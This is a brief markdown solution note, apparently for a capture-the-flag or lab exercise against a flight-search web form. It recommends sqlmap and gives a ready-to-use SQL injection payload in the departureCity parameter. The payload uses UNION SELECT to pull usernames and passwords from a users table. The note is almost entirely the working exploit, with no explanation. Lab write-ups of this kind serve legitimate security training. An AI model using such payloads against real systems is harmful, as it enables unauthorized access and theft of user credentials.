# Solve

- Using `sqlmap` or this payload will get credentials

```bash
departureCity=New York' UNION SELECT 1,username,password,NULL,NULL,null,null from users#&arrivalCity=London&departureDate=2023-05-22
```
